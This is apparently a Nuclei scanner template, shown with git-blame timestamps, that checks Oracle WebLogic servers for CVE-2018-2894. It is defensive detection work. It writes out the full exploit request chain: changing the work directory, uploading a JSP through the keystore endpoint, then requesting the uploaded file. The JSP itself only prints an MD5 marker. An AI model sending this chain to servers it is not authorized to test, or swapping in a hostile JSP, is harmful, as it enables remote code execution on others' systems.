2021-04-10 13:44:41 +00:00
id : CVE-2018-2894
info :
2022-05-13 20:26:43 +00:00
name : Oracle WebLogic Server - Remote Code Execution
2021-09-12 14:20:30 +00:00
author : geeknik,pdteam
2021-04-10 13:44:41 +00:00
severity : critical
2022-05-13 20:26:43 +00:00
description : |
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent : WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3.
2021-09-12 14:20:30 +00:00
reference :
- https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894
2022-05-13 20:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-2894
2022-05-17 09:18:12 +00:00
- http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2018-2894
2022-08-27 04:41:18 +00:00
tags : cve2018,oracle,weblogic,rce,vulhub,cve
2021-04-10 13:44:41 +00:00
requests :
2021-09-12 14:20:30 +00:00
- raw :
- |
POST /ws_utc/resources/setting/options HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80
- |
POST /ws_utc/resources/setting/keystore HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition : form-data; name="ks_name"
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
{{randstr}}
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition : form-data; name="ks_edit_mode"
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition : form-data; name="ks_password_front"
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition : form-data; name="ks_password"
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition : form-data; name="ks_password_changed"
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition : form-data; name="ks_filename"; filename="{{randstr}}.jsp"
Content-Type : application/octet-stream
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
<%
String cve = "CVE-2018-2894";
MessageDigest alg = MessageDigest.getInstance("MD5");
2021-09-12 15:15:49 +00:00
alg.reset();
2021-09-12 14:20:30 +00:00
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
//0x03 is equal to 0x3, but we need 0x03 for our md5sum
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
2021-09-12 15:15:49 +00:00
2021-09-12 14:20:30 +00:00
out.println(hashedpasswd.toString());
%>
------WebKitFormBoundaryuim0dyiDSPBPu31g--
- |
GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1
Host : {{Hostname}}
extractors :
- type : regex
name : id
internal : true
group : 1
regex :
- '<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}'
2021-04-10 13:44:41 +00:00
matchers :
- type : word
words :
2021-09-12 14:20:30 +00:00
- "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894)
2022-05-13 20:26:43 +00:00
# Enhanced by mp on 2022/05/13